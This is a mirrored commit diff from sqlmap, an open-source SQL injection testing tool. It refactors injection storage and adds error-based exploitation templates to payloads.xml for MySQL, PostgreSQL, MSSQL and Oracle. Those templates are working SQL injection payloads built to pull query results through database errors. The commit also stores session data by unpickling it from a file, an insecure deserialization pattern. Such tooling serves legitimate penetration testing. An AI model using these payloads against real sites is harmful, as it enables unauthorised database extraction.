mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-23 15:54:24 +03:00
Added tag <epayload> to the payloads.xml's <test> tag to define which payload to use when exploiting the test type.
Removed some useless tests. Moved <error> from queries.xml to payloads.xml as it makes more sense. Beeps at sql inj found only if --beep is provided. Minor fix in order to be able to pickle advancedDict() objects. Minor code refactoring. Removed useless folders.
This commit is contained in:
Bernardo Damele
parent
c00ea7f5e5
commit
089c16a1b8
|
|
@ -33,6 +33,7 @@ from lib.core.datatype import injectionDict
|
|||
from lib.core.enums import HTTPMETHOD
|
||||
from lib.core.enums import NULLCONNECTION
|
||||
from lib.core.enums import PAYLOAD
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.exception import sqlmapConnectionException
|
||||
from lib.core.exception import sqlmapGenericException
|
||||
from lib.core.exception import sqlmapNoneDataException
|
||||
|
|
@ -331,14 +332,28 @@ def checkSqlInjection(place, parameter, value):
|
|||
# Feed with the boundaries details only the first time a
|
||||
# test has been successful
|
||||
if injection.place is None or injection.parameter is None:
|
||||
if place == PLACE.UA:
|
||||
injection.parameter = conf.agent
|
||||
else:
|
||||
injection.parameter = parameter
|
||||
|
||||
injection.place = place
|
||||
injection.parameter = parameter
|
||||
injection.ptype = ptype
|
||||
injection.prefix = prefix
|
||||
injection.suffix = suffix
|
||||
|
||||
if "epayload" in test:
|
||||
epayload = "%s%s" % (test.epayload, comment)
|
||||
else:
|
||||
epayload = None
|
||||
|
||||
# Feed with test details every time a test is successful
|
||||
injection.data[stype] = (title, agent.removePayloadDelimiters(reqPayload, False), where, comment)
|
||||
injection.data[stype] = advancedDict()
|
||||
injection.data[stype].title = title
|
||||
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False)
|
||||
injection.data[stype].where = where
|
||||
injection.data[stype].epayload = epayload
|
||||
injection.data[stype].comment = comment
|
||||
|
||||
if "details" in test:
|
||||
for detailKey, detailValue in test.details.items():
|
||||
|
|
@ -351,7 +366,8 @@ def checkSqlInjection(place, parameter, value):
|
|||
elif detailKey == "os" and injection.os is None:
|
||||
injection.os = detailValue
|
||||
|
||||
beep()
|
||||
if conf.beep:
|
||||
beep()
|
||||
|
||||
# There is no need to perform this test for other
|
||||
# <where> tags
|
||||
|
|
@ -703,7 +719,6 @@ def checkConnection(suppressOutput=False):
|
|||
try:
|
||||
page, _ = Request.queryPage(content=True)
|
||||
conf.seqMatcher.set_seq1(page)
|
||||
|
||||
except sqlmapConnectionException, errMsg:
|
||||
errMsg = getUnicode(errMsg)
|
||||
raise sqlmapConnectionException, errMsg
|
||||
|
|
|
|||
|
|
@ -107,10 +107,9 @@ def __formatInjection(inj):
|
|||
data += "Parameter: %s\n" % inj.parameter
|
||||
|
||||
for stype, sdata in inj.data.items():
|
||||
stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype
|
||||
data += " Type: %s\n" % stype
|
||||
data += " Title: %s\n" % sdata[0]
|
||||
data += " Payload: %s\n\n" % sdata[1]
|
||||
data += " Title: %s\n" % sdata.title
|
||||
data += " Payload: %s\n\n" % sdata.payload
|
||||
|
||||
return data
|
||||
|
||||
|
|
@ -136,7 +135,7 @@ def __saveToSessionFile():
|
|||
parameter = inj.parameter
|
||||
|
||||
for stype, sdata in inj.data.items():
|
||||
payload = sdata[1]
|
||||
payload = sdata.payload
|
||||
|
||||
if stype == 1:
|
||||
kb.booleanTest = payload
|
||||
|
|
@ -303,7 +302,8 @@ def start():
|
|||
# TODO: consider the following line in __setRequestParams()
|
||||
__testableParameters = True
|
||||
|
||||
if not kb.injection.place or not kb.injection.parameter:
|
||||
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
|
||||
and (kb.injection.place is None or kb.injection.parameter is None):
|
||||
if not conf.string and not conf.regexp and not conf.eRegexp:
|
||||
# NOTE: this is not needed anymore, leaving only to display
|
||||
# a warning message to the user in case the page is not stable
|
||||
|
|
@ -394,7 +394,7 @@ def start():
|
|||
__showInjections()
|
||||
__selectInjection()
|
||||
|
||||
if kb.injection.place and kb.injection.parameter:
|
||||
if kb.injection.place is not None and kb.injection.parameter is not None:
|
||||
if conf.multipleTargets:
|
||||
message = "do you want to exploit this SQL injection? [Y/n] "
|
||||
exploit = readInput(message, default="Y")
|
||||
|
|
|
|||
|
|
@ -158,6 +158,9 @@ class Agent:
|
|||
return string
|
||||
|
||||
def cleanupPayload(self, payload):
|
||||
if payload is None:
|
||||
return
|
||||
|
||||
randInt = randomInt()
|
||||
randInt1 = randomInt()
|
||||
randStr = randomStr()
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ class advancedDict(dict):
|
|||
try:
|
||||
return self.__getitem__(item)
|
||||
except KeyError:
|
||||
raise sqlmapDataException, "Unable to access item '%s'" % item
|
||||
raise sqlmapDataException, "unable to access item '%s'" % item
|
||||
|
||||
def __setattr__(self, item, value):
|
||||
"""
|
||||
|
|
@ -56,6 +56,12 @@ class advancedDict(dict):
|
|||
else:
|
||||
self.__setitem__(item, value)
|
||||
|
||||
def __getstate__(self):
|
||||
return self.__dict__
|
||||
|
||||
def __setstate__(self, dict):
|
||||
self.__dict__ = dict
|
||||
|
||||
def injectionDict():
|
||||
injection = advancedDict()
|
||||
|
||||
|
|
|
|||
|
|
@ -12,6 +12,8 @@ import re
|
|||
from lib.core.common import dataToSessionFile
|
||||
from lib.core.common import formatFingerprintString
|
||||
from lib.core.common import readInput
|
||||
from lib.core.convert import base64pickle
|
||||
from lib.core.convert import base64unpickle
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
|
|
@ -78,30 +80,15 @@ def setInjection(inj):
|
|||
session file.
|
||||
"""
|
||||
|
||||
if inj.place == PLACE.UA:
|
||||
inj.parameter = conf.agent
|
||||
|
||||
condition = (
|
||||
( not kb.resumedQueries
|
||||
or ( kb.resumedQueries.has_key(conf.url) and
|
||||
( not kb.resumedQueries[conf.url].has_key("Injection point")
|
||||
or not kb.resumedQueries[conf.url].has_key("Injection parameter")
|
||||
) ) )
|
||||
not kb.resumedQueries[conf.url].has_key("Injection data")
|
||||
) )
|
||||
)
|
||||
|
||||
if condition:
|
||||
dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.place))
|
||||
dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.parameter))
|
||||
dataToSessionFile("[%s][%s][%s][Injection parameter type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.PARAMETER[inj.ptype]))
|
||||
dataToSessionFile("[%s][%s][%s][Injection prefix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.prefix))
|
||||
dataToSessionFile("[%s][%s][%s][Injection suffix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.suffix))
|
||||
|
||||
for stype, sdata in inj.data.items():
|
||||
dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.SQLINJECTION[stype]))
|
||||
dataToSessionFile("[%s][%s][%s][Injection title][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[0]))
|
||||
dataToSessionFile("[%s][%s][%s][Injection payload][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[1]))
|
||||
dataToSessionFile("[%s][%s][%s][Injection where][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[2]))
|
||||
dataToSessionFile("[%s][%s][%s][Injection comment][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[3]))
|
||||
dataToSessionFile("[%s][%s][%s][Injection data][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), base64pickle(inj)))
|
||||
|
||||
def setDbms(dbms):
|
||||
"""
|
||||
|
|
@ -370,96 +357,11 @@ def resumeConfKb(expression, url, value):
|
|||
except ValueError:
|
||||
pass
|
||||
|
||||
elif expression == "Injection point" and url == conf.url:
|
||||
injPlace = value[:-1]
|
||||
elif expression == "Injection data" and url == conf.url:
|
||||
injection = base64unpickle(value[:-1])
|
||||
kb.injections.append(injection)
|
||||
|
||||
logMsg = "resuming injection point '%s' from session file" % injPlace
|
||||
logger.info(logMsg)
|
||||
|
||||
if not conf.paramDict.has_key(injPlace):
|
||||
warnMsg = "none of the parameters you provided "
|
||||
warnMsg += "matches the resumable injection point. "
|
||||
warnMsg += "sqlmap is going to reidentify the "
|
||||
warnMsg += "injectable point"
|
||||
logger.warn(warnMsg)
|
||||
else:
|
||||
if kb.injection.place is not None and kb.injection.parameter is not None:
|
||||
kb.injections.append(kb.injection)
|
||||
kb.injection = injectionDict()
|
||||
|
||||
kb.injection.place = injPlace
|
||||
|
||||
elif expression == "Injection parameter" and url == conf.url:
|
||||
injParameter = unSafeFormatString(value[:-1])
|
||||
|
||||
logMsg = "resuming injection parameter '%s' from session file" % injParameter
|
||||
logger.info(logMsg)
|
||||
|
||||
condition = (
|
||||
not conf.paramDict.has_key(kb.injection.place) or
|
||||
not conf.paramDict[kb.injection.place].has_key(injParameter)
|
||||
)
|
||||
|
||||
if condition:
|
||||
warnMsg = "none of the parameters you provided "
|
||||
warnMsg += "matches the resumable injection parameter. "
|
||||
warnMsg += "sqlmap is going to reidentify the "
|
||||
warnMsg += "injectable point"
|
||||
logger.warn(warnMsg)
|
||||
else:
|
||||
kb.injection.parameter = injParameter
|
||||
|
||||
elif expression == "Injection parameter type" and url == conf.url:
|
||||
kb.injection.ptype = unSafeFormatString(value[:-1])
|
||||
|
||||
logMsg = "resuming injection parameter type '%s' from session file" % kb.injection.ptype
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Injection prefix" and url == conf.url:
|
||||
kb.injection.prefix = unSafeFormatString(value[:-1])
|
||||
|
||||
logMsg = "resuming injection prefix '%s' from session file" % kb.injection.prefix
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Injection suffix" and url == conf.url:
|
||||
kb.injection.suffix = unSafeFormatString(value[:-1])
|
||||
|
||||
logMsg = "resuming injection suffix '%s' from session file" % kb.injection.suffix
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Injection type" and url == conf.url:
|
||||
stype = unSafeFormatString(value[:-1])
|
||||
kb.injection.data[stype] = []
|
||||
|
||||
logMsg = "resuming injection type '%s' from session file" % stype
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Injection title" and url == conf.url:
|
||||
title = unSafeFormatString(value[:-1])
|
||||
kb.injection.data[kb.injection.data.keys()[0]].append(title)
|
||||
|
||||
logMsg = "resuming injection title '%s' from session file" % title
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Injection payload" and url == conf.url:
|
||||
payload = unSafeFormatString(value[:-1])
|
||||
kb.injection.data[kb.injection.data.keys()[0]].append(payload)
|
||||
|
||||
logMsg = "resuming injection payload '%s' from session file" % payload
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Injection where" and url == conf.url:
|
||||
where = unSafeFormatString(value[:-1])
|
||||
kb.injection.data[kb.injection.data.keys()[0]].append(where)
|
||||
|
||||
logMsg = "resuming injection where '%s' from session file" % where
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Injection comment" and url == conf.url:
|
||||
comment = unSafeFormatString(value[:-1])
|
||||
kb.injection.data[kb.injection.data.keys()[0]].append(comment)
|
||||
|
||||
logMsg = "resuming injection comment '%s' from session file" % comment
|
||||
logMsg = "resuming injection data"
|
||||
logger.info(logMsg)
|
||||
|
||||
elif expression == "Boolean-based blind injection" and url == conf.url:
|
||||
|
|
|
|||
|
|
@ -14,6 +14,9 @@ from lib.core.data import paths
|
|||
from lib.core.datatype import advancedDict
|
||||
|
||||
def cleanupVals(values, tag):
|
||||
if isinstance(values, basestring):
|
||||
return values
|
||||
|
||||
count = 0
|
||||
|
||||
for value in values:
|
||||
|
|
@ -48,7 +51,7 @@ def parseXmlNode(node):
|
|||
|
||||
for child in element.getchildren():
|
||||
if child.text and child.text.strip():
|
||||
values = cleanupVals(child.text.split(','), child.tag)
|
||||
values = cleanupVals(child.text.split(',') if child.tag != "epayload" else child.text, child.tag)
|
||||
test[child.tag] = values
|
||||
else:
|
||||
if len(child.getchildren()) == 0:
|
||||
|
|
|
|||
|
|
@ -401,8 +401,8 @@ def goStacked(expression, silent=False):
|
|||
return direct(expression), None
|
||||
|
||||
comment = queries[kb.dbms].comment.query
|
||||
query = agent.prefixQuery("; %s" % expression)
|
||||
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||
query = agent.prefixQuery("; %s" % expression)
|
||||
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||
|
||||
debugMsg = "query: %s" % query
|
||||
logger.debug(debugMsg)
|
||||
|
|
@ -412,7 +412,7 @@ def goStacked(expression, silent=False):
|
|||
|
||||
return payload, page
|
||||
|
||||
def goError(expression, suppressOutput=False, returnPayload=False):
|
||||
def goError(expression, suppressOutput=False):
|
||||
"""
|
||||
Retrieve the output of a SQL query taking advantage of an error-based
|
||||
SQL injection vulnerability on the affected parameter.
|
||||
|
|
@ -436,10 +436,8 @@ def goError(expression, suppressOutput=False, returnPayload=False):
|
|||
result = resume(expression, None)
|
||||
|
||||
if not result:
|
||||
result = errorUse(expression, returnPayload)
|
||||
|
||||
if not returnPayload:
|
||||
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
|
||||
result = errorUse(expression)
|
||||
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
|
||||
|
||||
if suppressOutput:
|
||||
conf.verbose = popValue()
|
||||
|
|
|
|||
|
|
@ -28,45 +28,37 @@ from lib.utils.resume import resume
|
|||
from lib.core.settings import ERROR_SPACE
|
||||
from lib.core.settings import ERROR_EMPTY_CHAR
|
||||
|
||||
def errorUse(expression, returnPayload=False):
|
||||
def errorUse(expression):
|
||||
"""
|
||||
Retrieve the output of a SQL query taking advantage of an error SQL
|
||||
injection vulnerability on the affected parameter.
|
||||
"""
|
||||
|
||||
output = None
|
||||
logic = conf.logic
|
||||
randInt = randomInt(1)
|
||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
||||
query = agent.suffixQuery(query)
|
||||
startLimiter = ""
|
||||
endLimiter = ""
|
||||
output = None
|
||||
randInt = randomInt(1)
|
||||
query = agent.cleanupPayload(kb.injection.data[2].epayload)
|
||||
query = agent.prefixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
|
||||
|
||||
expressionUnescaped = expression
|
||||
|
||||
if kb.dbmsDetected:
|
||||
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
||||
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
||||
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
||||
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
||||
|
||||
if kb.dbms == DBMS.MYSQL:
|
||||
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
||||
if kb.dbms == DBMS.MYSQL:
|
||||
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
||||
|
||||
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
||||
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
||||
startLimiter = unescaper.unescape("'%s'" % kb.misc.start)
|
||||
endLimiter = unescaper.unescape("'%s'" % kb.misc.stop)
|
||||
else:
|
||||
expressionUnescaped = kb.misc.handler.unescape(expression)
|
||||
startLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.start)
|
||||
endLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
|
||||
expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
||||
expression = safeStringFormat(query, expression)
|
||||
expression = unescaper.unescape(expression)
|
||||
|
||||
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
|
||||
debugMsg = "query: %s" % forgedQuery
|
||||
debugMsg = "query: %s" % expression
|
||||
logger.debug(debugMsg)
|
||||
|
||||
payload = agent.payload(newValue=forgedQuery)
|
||||
result = Request.queryPage(payload, content=True)
|
||||
match = re.search('%s(?P<result>.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE)
|
||||
payload = agent.payload(newValue=expression)
|
||||
reqBody, _ = Request.queryPage(payload, content=True)
|
||||
match = re.search(check, reqBody, re.DOTALL | re.IGNORECASE)
|
||||
|
||||
if match:
|
||||
output = match.group('result')
|
||||
|
|
@ -78,7 +70,4 @@ def errorUse(expression, returnPayload=False):
|
|||
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
||||
logger.info(infoMsg)
|
||||
|
||||
if returnPayload:
|
||||
return output, payload
|
||||
else:
|
||||
return output
|
||||
return output
|
||||
|
|
|
|||
|
|
@ -1,10 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
$Id$
|
||||
|
||||
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
pass
|
||||
|
|
@ -126,6 +126,9 @@ Tag: <test>
|
|||
original value to its negative representation
|
||||
3: Replace the parameter original value
|
||||
|
||||
Sub-tag: <epayload>
|
||||
The payload that will be used to exploit the injection point.
|
||||
|
||||
Sub-tag: <request>
|
||||
What to inject for this test.
|
||||
|
||||
|
|
@ -187,6 +190,7 @@ Formats:
|
|||
<risk></risk>
|
||||
<clause></clause>
|
||||
<where></where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload></payload>
|
||||
<comment></comment>
|
||||
|
|
@ -403,6 +407,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
|
|
@ -418,6 +423,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
|
|
@ -436,6 +442,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
|
|
@ -455,6 +462,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
|
@ -473,6 +481,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
|
@ -491,6 +500,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
|
@ -511,6 +521,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
|
|
@ -526,6 +537,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
|
|
@ -545,6 +557,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
|
@ -563,6 +576,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
|
@ -581,6 +595,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
|
@ -601,6 +616,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
|
|
@ -619,6 +635,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
|
|
@ -638,6 +655,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
||||
</request>
|
||||
|
|
@ -656,6 +674,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
|
|
@ -674,6 +693,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
|
@ -699,6 +719,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
|
|
@ -718,6 +739,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||
<request>
|
||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
|
|
@ -736,6 +758,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||
<request>
|
||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
|
|
@ -754,6 +777,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
|
@ -772,6 +796,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
|
|
@ -791,6 +816,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||
<request>
|
||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
|
|
@ -809,6 +835,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||
<request>
|
||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
|
|
@ -827,6 +854,7 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
